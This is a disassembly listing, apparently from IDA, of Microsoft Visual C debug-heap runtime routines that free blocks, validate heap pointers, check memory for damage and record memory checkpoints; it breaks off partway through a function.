loc_41DAAF: ; CODE XREF: sub_41D8A0+249�j
mov edx, [ebp+Dst]
cmp dword ptr [edx+0Ch], 0FEDCBABCh
jnz short loc_41DAC4
mov eax, [ebp+Dst]
cmp dword ptr [eax+18h], 0
jz short loc_41DAE5
loc_41DAC4: ; CODE XREF: sub_41D8A0+219�j
push offset aPheadNlineIgno ; "pHead->nLine == IGNORE_LINE && pHead->l"...
push 0 ; int
push 42Fh ; Value
push offset aDbgheap_c ; "dbgheap.c"
push 2 ; int
call __CrtDbgReport
add esp, 14h
cmp eax, 1
jnz short loc_41DAE5
int 3 ; Trap to Debugger
loc_41DAE5: ; CODE XREF: sub_41D8A0+222�j
; sub_41D8A0+242�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41DAAF
mov edx, [ebp+Dst]
mov eax, [edx+10h]
add eax, 24h
push eax ; Size
xor ecx, ecx
mov cl, byte_452A0D
push ecx ; Val
mov edx, [ebp+Dst]
push edx ; Dst
call _memset
add esp, 0Ch
mov eax, [ebp+Dst]
push eax
call sub_424AF0
add esp, 4
jmp loc_41DC85
; ---------------------------------------------------------------------------
loc_41DB1B: ; CODE XREF: sub_41D8A0+20D�j
mov ecx, [ebp+Dst]
cmp dword ptr [ecx+14h], 2
jnz short loc_41DB31
cmp [ebp+arg_4], 1
jnz short loc_41DB31
mov [ebp+arg_4], 2
loc_41DB31: ; CODE XREF: sub_41D8A0+282�j
; sub_41D8A0+288�j ...
mov edx, [ebp+Dst]
mov eax, [edx+14h]
cmp eax, [ebp+arg_4]
jz short loc_41DB5D
push offset aPheadNblockuse ; "pHead->nBlockUse == nBlockUse"
push 0 ; int
push 43Ch ; Value
push offset aDbgheap_c ; "dbgheap.c"
push 2 ; int
call __CrtDbgReport
add esp, 14h
cmp eax, 1
jnz short loc_41DB5D
int 3 ; Trap to Debugger
loc_41DB5D: ; CODE XREF: sub_41D8A0+29A�j
; sub_41D8A0+2BA�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41DB31
mov edx, [ebp+Dst]
mov eax, dword_4F476C
sub eax, [edx+10h]
mov dword_4F476C, eax
mov ecx, dword_452A00
and ecx, 2
test ecx, ecx
jnz loc_41DC5C
mov edx, [ebp+Dst]
cmp dword ptr [edx], 0
jz short loc_41DB9C
mov eax, [ebp+Dst]
mov ecx, [eax]
mov edx, [ebp+Dst]
mov eax, [edx+4]
mov [ecx+4], eax
jmp short loc_41DBDA
; ---------------------------------------------------------------------------
loc_41DB9C: ; CODE XREF: sub_41D8A0+2EA�j
; sub_41D8A0+32C�j
mov ecx, dword_4F4760
cmp ecx, [ebp+Dst]
jz short loc_41DBC8
push offset a_plastblockPhe ; "_pLastBlock == pHead"
push 0 ; int
push 44Bh ; Value
push offset aDbgheap_c ; "dbgheap.c"
push 2 ; int
call __CrtDbgReport
add esp, 14h
cmp eax, 1
jnz short loc_41DBC8
int 3 ; Trap to Debugger
loc_41DBC8: ; CODE XREF: sub_41D8A0+305�j
; sub_41D8A0+325�j
xor edx, edx
test edx, edx
jnz short loc_41DB9C
mov eax, [ebp+Dst]
mov ecx, [eax+4]
mov dword_4F4760, ecx
loc_41DBDA: ; CODE XREF: sub_41D8A0+2FA�j
mov edx, [ebp+Dst]
cmp dword ptr [edx+4], 0
jz short loc_41DBF2
mov eax, [ebp+Dst]
mov ecx, [eax+4]
mov edx, [ebp+Dst]
mov eax, [edx]
mov [ecx], eax
jmp short loc_41DC2F
; ---------------------------------------------------------------------------
loc_41DBF2: ; CODE XREF: sub_41D8A0+341�j
; sub_41D8A0+382�j
mov ecx, dword_4F4768
cmp ecx, [ebp+Dst]
jz short loc_41DC1E
push offset a_pfirstblockPh ; "_pFirstBlock == pHead"
push 0 ; int
push 455h ; Value
push offset aDbgheap_c ; "dbgheap.c"
push 2 ; int
call __CrtDbgReport
add esp, 14h
cmp eax, 1
jnz short loc_41DC1E
int 3 ; Trap to Debugger
loc_41DC1E: ; CODE XREF: sub_41D8A0+35B�j
; sub_41D8A0+37B�j
xor edx, edx
test edx, edx
jnz short loc_41DBF2
mov eax, [ebp+Dst]
mov ecx, [eax]
mov dword_4F4768, ecx
loc_41DC2F: ; CODE XREF: sub_41D8A0+350�j
mov edx, [ebp+Dst]
mov eax, [edx+10h]
add eax, 24h
push eax ; Size
xor ecx, ecx
mov cl, byte_452A0D
push ecx ; Val
mov edx, [ebp+Dst]
push edx ; Dst
call _memset
add esp, 0Ch
mov eax, [ebp+Dst]
push eax
call sub_424AF0
add esp, 4
jmp short loc_41DC85
; ---------------------------------------------------------------------------
loc_41DC5C: ; CODE XREF: sub_41D8A0+2DE�j
mov ecx, [ebp+Dst]
mov dword ptr [ecx+14h], 0
mov edx, [ebp+Dst]
mov eax, [edx+10h]
push eax ; Size
xor ecx, ecx
mov cl, byte_452A0D
push ecx ; Val
mov edx, [ebp+Dst]
add edx, 20h
push edx ; Dst
call _memset
add esp, 0Ch
loc_41DC85: ; CODE XREF: sub_41D8A0+49�j
; sub_41D8A0+93�j ...
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41D8A0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 1
mov eax, [ebp+8]
push eax
call sub_41DCB0
add esp, 8
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DCB0 proc near ; CODE XREF: .text:0041DC99�p
; __onexit+11�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 0041DE2C SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43D920
push offset unknown_libname_3 ; Microsoft VisualC 2-8/net runtime
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFF0h
push ebx
push esi
push edi ; char
mov eax, dword_452A00
and eax, 4
test eax, eax
jz short loc_41DD0F
loc_41DCDF: ; CODE XREF: sub_41DCB0+5D�j
call sub_41DFF0
test eax, eax
jnz short loc_41DD09
push offset a_crtcheckmemor ; "_CrtCheckMemory()"
push 0 ; int
push 49Dh ; Value
push offset aDbgheap_c ; "dbgheap.c"
push 2 ; int
call __CrtDbgReport
add esp, 14h
cmp eax, 1
jnz short loc_41DD09
int 3 ; Trap to Debugger
loc_41DD09: ; CODE XREF: sub_41DCB0+36�j
; sub_41DCB0+56�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41DCDF
loc_41DD0F: ; CODE XREF: sub_41DCB0+2D�j
push 9
call __lock
add esp, 4
mov [ebp+var_4], 0
loc_41DD20: ; CODE XREF: sub_41DCB0+A5�j
mov edx, [ebp+arg_0]
push edx
call sub_41E4D0
add esp, 4
test eax, eax
jnz short loc_41DD51
push offset a_crtisvalidhea ; "_CrtIsValidHeapPointer(pUserData)"
push 0 ; int
push 4A9h ; Value
push offset aDbgheap_c ; "dbgheap.c"
push 2 ; int
call __CrtDbgReport
add esp, 14h
cmp eax, 1
jnz short loc_41DD51
int 3 ; Trap to Debugger
loc_41DD51: ; CODE XREF: sub_41DCB0+7E�j
; sub_41DCB0+9E�j
xor eax, eax
test eax, eax
jnz short loc_41DD20
mov ecx, [ebp+arg_0]
sub ecx, 20h
mov [ebp+var_20], ecx
loc_41DD60: ; CODE XREF: sub_41DCB0+107�j
mov edx, [ebp+var_20]
mov eax, [edx+14h]
and eax, 0FFFFh
cmp eax, 4
jz short loc_41DDB3
mov ecx, [ebp+var_20]
cmp dword ptr [ecx+14h], 1
jz short loc_41DDB3
mov edx, [ebp+var_20]
mov eax, [edx+14h]
and eax, 0FFFFh
cmp eax, 2
jz short loc_41DDB3
mov ecx, [ebp+var_20]
cmp dword ptr [ecx+14h], 3
jz short loc_41DDB3
push offset a_block_type_is ; "_BLOCK_TYPE_IS_VALID(pHead->nBlockUse)"
push 0 ; int
push 4AFh ; Value
push offset aDbgheap_c ; "dbgheap.c"
push 2 ; int
call __CrtDbgReport
add esp, 14h
cmp eax, 1
jnz short loc_41DDB3
int 3 ; Trap to Debugger
loc_41DDB3: ; CODE XREF: sub_41DCB0+BE�j
; sub_41DCB0+C7�j ...
xor edx, edx
test edx, edx
jnz short loc_41DD60
mov eax, [ebp+var_20]
cmp dword ptr [eax+14h], 2
jnz short loc_41DDCF
cmp [ebp+arg_4], 1
jnz short loc_41DDCF
mov [ebp+arg_4], 2
loc_41DDCF: ; CODE XREF: sub_41DCB0+110�j
; sub_41DCB0+116�j
mov ecx, [ebp+var_20]
cmp dword ptr [ecx+14h], 3
jz short loc_41DE0A
loc_41DDD8: ; CODE XREF: sub_41DCB0+158�j
mov edx, [ebp+var_20]
mov eax, [edx+14h]
cmp eax, [ebp+arg_4]
jz short loc_41DE04
push offset aPheadNblockuse ; "pHead->nBlockUse == nBlockUse"
push 0 ; int
push 4B6h ; Value
push offset aDbgheap_c ; "dbgheap.c"
push 2 ; int
call __CrtDbgReport
add esp, 14h
cmp eax, 1
jnz short loc_41DE04
int 3 ; Trap to Debugger
loc_41DE04: ; CODE XREF: sub_41DCB0+131�j
; sub_41DCB0+151�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41DDD8
loc_41DE0A: ; CODE XREF: sub_41DCB0+126�j
mov edx, [ebp+var_20]
mov eax, [edx+10h]
mov [ebp+var_1C], eax
mov [ebp+var_4], 0FFFFFFFFh
call sub_41DE21
jmp short loc_41DE2C
sub_41DCB0 endp
; =============== S U B R O U T I N E =======================================
sub_41DE21 proc near ; CODE XREF: sub_41DCB0+16A�p
; DATA XREF: .rdata:0043D928�o
push 9
call __unlock
add esp, 4
retn
sub_41DE21 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41DCB0
loc_41DE2C: ; CODE XREF: sub_41DCB0+16F�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_41DCB0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
mov eax, dword_452A08
mov [ebp-4], eax
mov ecx, [ebp+8]
mov dword_452A08, ecx
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; [000000BD BYTES: COLLAPSED FUNCTION __CrtSetDbgBlockType. PRESS KEYPAD "+" TO EXPAND]
; [0000000B BYTES: COLLAPSED FUNCTION sub_41DF1D. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [00000011 BYTES: COLLAPSED CHUNK OF FUNCTION __CrtSetDbgBlockType. PRESS KEYPAD "+" TO EXPAND]
align 10h
push ebp
mov ebp, esp
push ecx
mov eax, off_452DD0
mov [ebp-4], eax
mov ecx, [ebp+8]
mov off_452DD0, ecx
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; [00000088 BYTES: COLLAPSED FUNCTION _CheckBytes. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DFF0 proc near ; CODE XREF: __heap_alloc_dbg:loc_41CDBC�p
; _realloc_help:loc_41D272�p ...
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0041E370 SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43DAB8
push offset unknown_libname_3 ; Microsoft VisualC 2-8/net runtime
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFE0h
push ebx
push esi
push edi
mov eax, dword_452A00
and eax, 1
test eax, eax
jnz short loc_41E029
mov eax, 1
jmp loc_41E373
; ---------------------------------------------------------------------------
loc_41E029: ; CODE XREF: sub_41DFF0+2D�j
push 9
call __lock
add esp, 4
mov [ebp+var_4], 0
call unknown_libname_6 ; Microsoft VisualC 2-8/net runtime
mov [ebp+var_24], eax
cmp [ebp+var_24], 0FFFFFFFFh
jz loc_41E14E
cmp [ebp+var_24], 0FFFFFFFEh
jz loc_41E14E
mov ecx, [ebp+var_24]
mov [ebp+var_30], ecx
mov edx, [ebp+var_30]
add edx, 6
mov [ebp+var_30], edx
cmp [ebp+var_30], 3
ja loc_41E11C
mov eax, [ebp+var_30]
jmp ds:off_41E384[eax*4]
loc_41E079: ; CODE XREF: sub_41DFF0+AD�j
; DATA XREF: .text:0041E390�o
push offset a_heapchkFailsW ; "_heapchk fails with _HEAPBADBEGIN.\n"
push offset aS_33 ; "%s"
push 0 ; int
push 0 ; Value
push 0 ; int
push 0 ; int
call __CrtDbgReport
add esp, 18h
cmp eax, 1
jnz short loc_41E099
int 3 ; Trap to Debugger
loc_41E099: ; CODE XREF: sub_41DFF0+A6�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41E079
jmp loc_41E142
; ---------------------------------------------------------------------------
loc_41E0A4: ; CODE XREF: sub_41DFF0+82�j
; sub_41DFF0+D8�j
; DATA XREF: ...
push offset a_heapchkFail_0 ; "_heapchk fails with _HEAPBADNODE.\n"
push offset aS_33 ; "%s"
push 0 ; int
push 0 ; Value
push 0 ; int
push 0 ; int
call __CrtDbgReport
add esp, 18h
cmp eax, 1
jnz short loc_41E0C4
int 3 ; Trap to Debugger
loc_41E0C4: ; CODE XREF: sub_41DFF0+D1�j
xor edx, edx
test edx, edx
jnz short loc_41E0A4
jmp short loc_41E142
; ---------------------------------------------------------------------------
loc_41E0CC: ; CODE XREF: sub_41DFF0+82�j
; sub_41DFF0+100�j
; DATA XREF: ...
push offset a_heapchkFail_1 ; "_heapchk fails with _HEAPBADEND.\n"
push offset aS_33 ; "%s"
push 0 ; int
push 0 ; Value
push 0 ; int
push 0 ; int
call __CrtDbgReport
add esp, 18h
cmp eax, 1
jnz short loc_41E0EC
int 3 ; Trap to Debugger
loc_41E0EC: ; CODE XREF: sub_41DFF0+F9�j
xor eax, eax
test eax, eax
jnz short loc_41E0CC
jmp short loc_41E142
; ---------------------------------------------------------------------------
loc_41E0F4: ; CODE XREF: sub_41DFF0+82�j
; sub_41DFF0+128�j
; DATA XREF: ...
push offset a_heapchkFail_2 ; "_heapchk fails with _HEAPBADPTR.\n"
push offset aS_33 ; "%s"
push 0 ; int
push 0 ; Value
push 0 ; int
push 0 ; int
call __CrtDbgReport
add esp, 18h
cmp eax, 1
jnz short loc_41E114
int 3 ; Trap to Debugger
loc_41E114: ; CODE XREF: sub_41DFF0+121�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41E0F4
jmp short loc_41E142
; ---------------------------------------------------------------------------
loc_41E11C: ; CODE XREF: sub_41DFF0+79�j
; sub_41DFF0+150�j
push offset a_heapchkFail_3 ; "_heapchk fails with unknown return valu"...
push offset aS_33 ; "%s"
push 0 ; int
push 0 ; Value
push 0 ; int
push 0 ; int
call __CrtDbgReport
add esp, 18h
cmp eax, 1
jnz short loc_41E13C
int 3 ; Trap to Debugger
loc_41E13C: ; CODE XREF: sub_41DFF0+149�j
xor edx, edx
test edx, edx
jnz short loc_41E11C
loc_41E142: ; CODE XREF: sub_41DFF0+AF�j
; sub_41DFF0+DA�j ...
mov [ebp+var_1C], 0
jmp loc_41E357
; ---------------------------------------------------------------------------
loc_41E14E: ; CODE XREF: sub_41DFF0+56�j
; sub_41DFF0+60�j
mov [ebp+var_1C], 1
mov eax, dword_4F4768
mov [ebp+var_20], eax
jmp short loc_41E167
; ---------------------------------------------------------------------------
loc_41E15F: ; CODE XREF: sub_41DFF0:loc_41E352�j
mov ecx, [ebp+var_20]
mov edx, [ecx]
mov [ebp+var_20], edx
loc_41E167: ; CODE XREF: sub_41DFF0+16D�j
cmp [ebp+var_20], 0
jz loc_41E357
mov [ebp+var_28], 1
mov eax, [ebp+var_20]
mov ecx, [eax+14h]
and ecx, 0FFFFh
cmp ecx, 4
jz short loc_41E1AC
mov edx, [ebp+var_20]
cmp dword ptr [edx+14h], 1
jz short loc_41E1AC
mov eax, [ebp+var_20]
mov ecx, [eax+14h]
and ecx, 0FFFFh
cmp ecx, 2
jz short loc_41E1AC
mov edx, [ebp+var_20]
cmp dword ptr [edx+14h], 3
jnz short loc_41E1C4
loc_41E1AC: ; CODE XREF: sub_41DFF0+197�j
; sub_41DFF0+1A0�j ...
mov eax, [ebp+var_20]
mov ecx, [eax+14h]
and ecx, 0FFFFh
mov edx, off_452A10[ecx*4]
mov dword ptr [ebp+var_2C], edx
jmp short loc_41E1CB
; ---------------------------------------------------------------------------
loc_41E1C4: ; CODE XREF: sub_41DFF0+1BA�j
mov dword ptr [ebp+var_2C], offset aDamaged ; "DAMAGED"
loc_41E1CB: ; CODE XREF: sub_41DFF0+1D2�j
push 4
mov al, byte_452A0C
push eax
mov ecx, [ebp+var_20]
add ecx, 1Ch
push ecx
call _CheckBytes
add esp, 0Ch
test eax, eax
jnz short loc_41E220
loc_41E1E6: ; CODE XREF: sub_41DFF0+227�j
mov edx, [ebp+var_20]
add edx, 20h
push edx
mov eax, [ebp+var_20]
mov ecx, [eax+18h]
push ecx
mov edx, dword ptr [ebp+var_2C]
push edx ; char
push offset aDamageBeforeHs ; "DAMAGE: before %hs block (#%d) at 0x%08"...
push 0 ; int
push 0 ; Value
push 0 ; int
push 0 ; int
call __CrtDbgReport
add esp, 20h
cmp eax, 1
jnz short loc_41E213
int 3 ; Trap to Debugger
loc_41E213: ; CODE XREF: sub_41DFF0+220�j
xor eax, eax
test eax, eax
jnz short loc_41E1E6
mov [ebp+var_28], 0
loc_41E220: ; CODE XREF: sub_41DFF0+1F4�j
push 4
mov cl, byte_452A0C
push ecx
mov edx, [ebp+var_20]
mov eax, [edx+10h]
mov ecx, [ebp+var_20]
lea edx, [ecx+eax+20h]
push edx
call _CheckBytes
add esp, 0Ch
test eax, eax
jnz short loc_41E27D
loc_41E243: ; CODE XREF: sub_41DFF0+284�j
mov eax, [ebp+var_20]
add eax, 20h
push eax
mov ecx, [ebp+var_20]
mov edx, [ecx+18h]
push edx
mov eax, dword ptr [ebp+var_2C]
push eax ; char
push offset aDamageAfterHsB ; "DAMAGE: after %hs block (#%d) at 0x%08X"...
push 0 ; int
push 0 ; Value
push 0 ; int
push 0 ; int
call __CrtDbgReport
add esp, 20h
cmp eax, 1
jnz short loc_41E270
int 3 ; Trap to Debugger
loc_41E270: ; CODE XREF: sub_41DFF0+27D�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41E243
mov [ebp+var_28], 0
loc_41E27D: ; CODE XREF: sub_41DFF0+251�j
mov edx, [ebp+var_20]
cmp dword ptr [edx+14h], 0
jnz short loc_41E2D6
mov eax, [ebp+var_20]
mov ecx, [eax+10h]
push ecx
mov dl, byte_452A0D
push edx
mov eax, [ebp+var_20]
add eax, 20h
push eax
call _CheckBytes
add esp, 0Ch
test eax, eax
jnz short loc_41E2D6
loc_41E2A7: ; CODE XREF: sub_41DFF0+2DD�j
mov ecx, [ebp+var_20]
add ecx, 20h
push ecx ; char
push offset aDamageOnTopOfF ; "DAMAGE: on top of Free block at 0x%08X."...
push 0 ; int
push 0 ; Value
push 0 ; int
push 0 ; int
call __CrtDbgReport
add esp, 18h
cmp eax, 1
jnz short loc_41E2C9
int 3 ; Trap to Debugger
loc_41E2C9: ; CODE XREF: sub_41DFF0+2D6�j
xor edx, edx
test edx, edx
jnz short loc_41E2A7
mov [ebp+var_28], 0
loc_41E2D6: ; CODE XREF: sub_41DFF0+294�j
; sub_41DFF0+2B5�j
cmp [ebp+var_28], 0
jnz short loc_41E352
mov eax, [ebp+var_20]
cmp dword ptr [eax+8], 0
jz short loc_41E318
loc_41E2E5: ; CODE XREF: sub_41DFF0+326�j
mov ecx, [ebp+var_20]
mov edx, [ecx+0Ch]
push edx
mov eax, [ebp+var_20]
mov ecx, [eax+8]
push ecx
mov edx, dword ptr [ebp+var_2C]
push edx ; char
push offset aHsAllocatedAtF ; "%hs allocated at file %hs(%d).\n"
push 0 ; int
push 0 ; Value
push 0 ; int
push 0 ; int
call __CrtDbgReport
add esp, 20h
cmp eax, 1
jnz short loc_41E312
int 3 ; Trap to Debugger
loc_41E312: ; CODE XREF: sub_41DFF0+31F�j
xor eax, eax
test eax, eax
jnz short loc_41E2E5
loc_41E318: ; CODE XREF: sub_41DFF0+2F3�j
; sub_41DFF0+359�j
mov ecx, [ebp+var_20]
mov edx, [ecx+10h]
push edx
mov eax, [ebp+var_20]
add eax, 20h
push eax
mov ecx, dword ptr [ebp+var_2C]
push ecx ; char
push offset aHsLocatedAt0x0 ; "%hs located at 0x%08X is %u bytes long."...
push 0 ; int
push 0 ; Value
push 0 ; int
push 0 ; int
call __CrtDbgReport
add esp, 20h
cmp eax, 1
jnz short loc_41E345
int 3 ; Trap to Debugger
loc_41E345: ; CODE XREF: sub_41DFF0+352�j
xor edx, edx
test edx, edx
jnz short loc_41E318
mov [ebp+var_1C], 0
loc_41E352: ; CODE XREF: sub_41DFF0+2EA�j
jmp loc_41E15F
; ---------------------------------------------------------------------------
loc_41E357: ; CODE XREF: sub_41DFF0+159�j
; sub_41DFF0+17B�j
mov [ebp+var_4], 0FFFFFFFFh
call sub_41E365
jmp short loc_41E370
sub_41DFF0 endp
; =============== S U B R O U T I N E =======================================
sub_41E365 proc near ; CODE XREF: sub_41DFF0+36E�p
; DATA XREF: .rdata:0043DAC0�o
push 9
call __unlock
add esp, 4
retn
sub_41E365 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41DFF0
loc_41E370: ; CODE XREF: sub_41DFF0+373�j
mov eax, [ebp+var_1C]
loc_41E373: ; CODE XREF: sub_41DFF0+34�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_41DFF0
; ---------------------------------------------------------------------------
off_41E384 dd offset loc_41E0F4 ; DATA XREF: sub_41DFF0+82�r
dd offset loc_41E0CC
dd offset loc_41E0A4
dd offset loc_41E079
align 10h
; [00000022 BYTES: COLLAPSED FUNCTION __CrtSetDbgFlag. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000008D BYTES: COLLAPSED FUNCTION __CrtDoForAllClientObjects. PRESS KEYPAD "+" TO EXPAND]
; [0000000B BYTES: COLLAPSED FUNCTION sub_41E45D. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [00000011 BYTES: COLLAPSED CHUNK OF FUNCTION __CrtDoForAllClientObjects. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000004B BYTES: COLLAPSED FUNCTION __CrtIsValidPointer. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E4D0 proc near ; CODE XREF: _realloc_help+1AA�p
; sub_41D8A0+9C�p ...
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
cmp [ebp+arg_0], 0
jnz short loc_41E4E3
xor eax, eax
jmp loc_41E5F0
; ---------------------------------------------------------------------------
loc_41E4E3: ; CODE XREF: sub_41E4D0+A�j
push 1
push 20h
mov eax, [ebp+arg_0]
sub eax, 20h
push eax
call __CrtIsValidPointer
add esp, 0Ch
test eax, eax
jnz short loc_41E501
xor eax, eax
jmp loc_41E5F0
; ---------------------------------------------------------------------------
loc_41E501: ; CODE XREF: sub_41E4D0+28�j
cmp dword_4F4E6C, 3
jnz short loc_41E56E
mov ecx, [ebp+arg_0]
sub ecx, 20h
push ecx
call ___sbh_find_block
add esp, 4
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_41E53A
mov edx, [ebp+arg_0]
sub edx, 20h
push edx
mov eax, [ebp+var_4]
push eax
call ___sbh_verify_block
add esp, 8
jmp loc_41E5F0
; ---------------------------------------------------------------------------
loc_41E53A: ; CODE XREF: sub_41E4D0+50�j
mov ecx, dword_4F4778
and ecx, 8000h
test ecx, ecx
jz short loc_41E554
mov eax, 1
jmp loc_41E5F0
; ---------------------------------------------------------------------------
loc_41E554: ; CODE XREF: sub_41E4D0+78�j
mov edx, [ebp+arg_0]
sub edx, 20h
push edx
push 0
mov eax, dword_4F4E68
push eax
call ds:dword_4F64A8 ; HeapValidate
jmp loc_41E5F0
; ---------------------------------------------------------------------------
loc_41E56E: ; CODE XREF: sub_41E4D0+38�j
cmp dword_4F4E6C, 2
jnz short loc_41E5DA
lea ecx, [ebp+var_8]
push ecx
lea edx, [ebp+var_10]
push edx
mov eax, [ebp+arg_0]
sub eax, 20h
push eax
call ___sbh_find_block_0
add esp, 0Ch
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_41E5AD
mov ecx, [ebp+var_C]
xor edx, edx
mov dl, [ecx]
test edx, edx
jz short loc_41E5A9
mov eax, 1
jmp short loc_41E5F0
; ---------------------------------------------------------------------------
loc_41E5A9: ; CODE XREF: sub_41E4D0+D0�j
xor eax, eax
jmp short loc_41E5F0
; ---------------------------------------------------------------------------
loc_41E5AD: ; CODE XREF: sub_41E4D0+C5�j
mov eax, dword_4F4778
and eax, 8000h
test eax, eax
jz short loc_41E5C2
mov eax, 1
jmp short loc_41E5F0
; ---------------------------------------------------------------------------
loc_41E5C2: ; CODE XREF: sub_41E4D0+E9�j
mov ecx, [ebp+arg_0]
sub ecx, 20h
push ecx
push 0
mov edx, dword_4F4E68
push edx
call ds:dword_4F64A8 ; HeapValidate
jmp short loc_41E5F0
; ---------------------------------------------------------------------------
loc_41E5DA: ; CODE XREF: sub_41E4D0+A5�j
mov eax, [ebp+arg_0]
sub eax, 20h
push eax
push 0
mov ecx, dword_4F4E68
push ecx
call ds:dword_4F64A8 ; HeapValidate
loc_41E5F0: ; CODE XREF: sub_41E4D0+E�j
; sub_41E4D0+2C�j ...
mov esp, ebp
pop ebp
retn
sub_41E4D0 endp
; ---------------------------------------------------------------------------
align 10h
; [00000106 BYTES: COLLAPSED FUNCTION __CrtIsMemoryBlock. PRESS KEYPAD "+" TO EXPAND]
; [0000000B BYTES: COLLAPSED FUNCTION sub_41E706. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [00000014 BYTES: COLLAPSED CHUNK OF FUNCTION __CrtIsMemoryBlock. PRESS KEYPAD "+" TO EXPAND]
align 10h
push ebp
mov ebp, esp
push ecx
mov eax, dword_4F5EB8
mov [ebp-4], eax
mov ecx, [ebp+8]
mov dword_4F5EB8, ecx
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E750 proc near ; CODE XREF: __CrtDumpMemoryLeaks+D�p
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0041E8E3 SIZE 00000011 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43DB30
push offset unknown_libname_3 ; Microsoft VisualC 2-8/net runtime
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFF0h
push ebx
push esi
push edi
cmp [ebp+arg_0], 0
jnz short loc_41E7A4
loc_41E779: ; CODE XREF: sub_41E750+4D�j
push offset a_crtmemcheckpo ; "_CrtMemCheckPoint: NULL state pointer.\n"...
push offset aS_33 ; "%s"
push 0 ; int
push 0 ; Value
push 0 ; int
push 0 ; int
call __CrtDbgReport
add esp, 18h
cmp eax, 1
jnz short loc_41E799
int 3 ; Trap to Debugger
loc_41E799: ; CODE XREF: sub_41E750+46�j
xor eax, eax
test eax, eax
jnz short loc_41E779
jmp loc_41E8E3
; ---------------------------------------------------------------------------
loc_41E7A4: ; CODE XREF: sub_41E750+27�j
push 9
call __lock
add esp, 4
mov [ebp+var_4], 0
mov ecx, [ebp+arg_0]
mov edx, dword_4F4768
mov [ecx], edx
mov [ebp+var_1C], 0
jmp short loc_41E7D2
; ---------------------------------------------------------------------------
loc_41E7C9: ; CODE XREF: sub_41E750+A4�j
mov eax, [ebp+var_1C]
add eax, 1
mov [ebp+var_1C], eax
loc_41E7D2: ; CODE XREF: sub_41E750+77�j
cmp [ebp+var_1C], 5
jge short loc_41E7F6
mov ecx, [ebp+var_1C]
mov edx, [ebp+arg_0]
mov dword ptr [edx+ecx*4+18h], 0
mov eax, [ebp+var_1C]
mov ecx, [ebp+arg_0]
mov dword ptr [ecx+eax*4+4], 0
jmp short loc_41E7C9
; ---------------------------------------------------------------------------
loc_41E7F6: ; CODE XREF: sub_41E750+86�j
mov edx, dword_4F4768
mov dword ptr [ebp+var_20], edx
jmp short loc_41E809
; ---------------------------------------------------------------------------
loc_41E801: ; CODE XREF: sub_41E750:loc_41E8AD�j
mov eax, dword ptr [ebp+var_20]
mov ecx, [eax]
mov dword ptr [ebp+var_20], ecx
loc_41E809: ; CODE XREF: sub_41E750+AF�j
cmp dword ptr [ebp+var_20], 0
jz loc_41E8B2
mov edx, dword ptr [ebp+var_20]
mov eax, [edx+14h]
and eax, 0FFFFh
test eax, eax
jl short loc_41E888
mov ecx, dword ptr [ebp+var_20]
mov edx, [ecx+14h]
and edx, 0FFFFh
cmp edx, 5
jge short loc_41E888
mov eax, dword ptr [ebp+var_20]
mov ecx, [eax+14h]
and ecx, 0FFFFh
mov edx, [ebp+arg_0]
mov eax, [edx+ecx*4+4]
add eax, 1
